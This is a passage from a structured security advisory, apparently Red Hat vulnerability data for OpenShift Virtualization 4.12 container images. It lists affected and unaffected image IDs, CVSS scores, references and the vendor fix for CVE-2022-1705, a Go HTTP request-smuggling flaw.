"8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: don't close fd 0 on ForkExec error", }, { cve: "CVE-2022-1705", cwe: { id: "CWE-444", name: "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107374", }, ], notes: [ { category: "description", text: "A flaw was found in golang. The HTTP/1 client accepted invalid Transfer-Encoding headers indicating \"chunked\" encoding. This issue could allow request smuggling, but only if combined with an intermediate server that also improperly accepts the header as invalid.", title: "Vulnerability description", }, { category: "summary", text: "golang: net/http: improper sanitization of Transfer-Encoding header", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-1705", }, { category: "external", summary: "RHBZ#2107374", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-1705", url: "https://www.cve.org/CVERecord?id=CVE-2022-1705", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-1705", }, { category: "external", summary: "https://go.dev/issue/53188", url: "https://go.dev/issue/53188", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", 